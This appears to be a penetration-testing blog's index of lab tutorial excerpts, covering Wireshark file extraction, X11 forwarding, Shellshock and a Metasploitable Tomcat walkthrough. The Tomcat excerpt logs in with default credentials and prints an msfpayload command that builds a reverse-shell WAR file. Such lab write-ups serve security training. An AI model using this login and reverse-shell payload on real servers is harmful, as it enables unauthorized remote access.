Extracting Windows executables with Wireshark

This is an example of how to use Wireshark to extract a Windows executable file from an FTP transfer between two computers on the same network. In this walkthrough I’ll be using three VMs:
-A Linux VM to serve as the FTP server with a file on it. (Bottom right)
-A Windows XP VM to connect to the Linux server and download the file. (Top right)
-A kali Linux VM to listen to the network while the file transfer happens. (Left)


I’ll start by setting up Wireshark on my Kali VM to listen in promiscuous mode and click start to make Wireshark begin listening to traffic on the network.

X11 Forwarding Mac

This tutorial is going to cover setting up X11 forwarding via SSH from your Kali box to your Mac.  This is a great way to host your Kali machine on a server (Home Server or VPS) and still have access to tools like Burp that require a GUI.

First thing you will need to do is download and install XQuartz from http://xquartz.macosforge.org/landing/

Next we need to enable the ssh server service.

Screen Shot 2014-10-03 at 1.32.17 PM
Lets make sure we know the IP of our machine.  This is my internal lab machine so the IP is non routable, but if you had this going through a firewall you would obviously need to forward SSH to your Kali box before trying to SSH to your external IP address.

Shellshock demo set-up and POC

I’m not sure if everyone has been made aware of this, but a BASH vulnerability has been discovered… /sarcasm

OK, seriously, as everyone has heard by now, “Shellshock” is the new hot topic right now. Since I am one who learns by doing, I decided to give it a go, and see exactly how it works. My first instinct was to see how it works against the SSH protocol (CGI write up is coming soon). Now that I see what it actually is, I see that it would take an extraordinary set of circumstances for it to be a viable method of gaining entry (at least through SSH), but should those circumstances be present in your environment, it could be devastating (So make sure you patch everything up!).

Metasploitable Series – Tomcat

In this episode we are going to take a look at the Tomcat Service on our Metasploitable Box.

Lets start with a Nmap scan…

So we can see on port 8180 we have Tomcat running…  Lets take a look at it…

As we can see the Tomcat manager requires a login.  I know that by default the username and password is ‘tomcat’ lets try that.

we have logged into the manager application!  Lets now take a look at generating a reverse shell!

msfpayload linux/x86/shell_reverse_tcp RHOST= LPORT=4444 W > myshell.war

Simple Buffer Overflow bypassing SEH

Here recently, I have gotten more interested in exploit writing, and the entire process of it. Being that I am noob to this, I obviously started my quest by looking for tutorials. Unfortunately I wasn’t able to find the “Explain like I’m 5” tutorial that I needed, and the entire process took me much longer than anticipated. Now that I finally got it figured out, I wanted to share with the world! 😀

New Video Series

We are excited to announce we have started production on our first video series!  “Metasploitable without Metasploit”  The focus of this video series it to teach the up and coming InfoSec student how to manually exploit Metasploitable.  This is going to help you get a much better understanding as to why these exploits work, and what makes them tick.

Don’t get us wrong we love Metasploit, but we also feel it is important to have a solid foundation in exploitation the manual way.  This video series was inspired by taking the OSCP course, which has very strict guidelines for when and what you can do with Metasploit.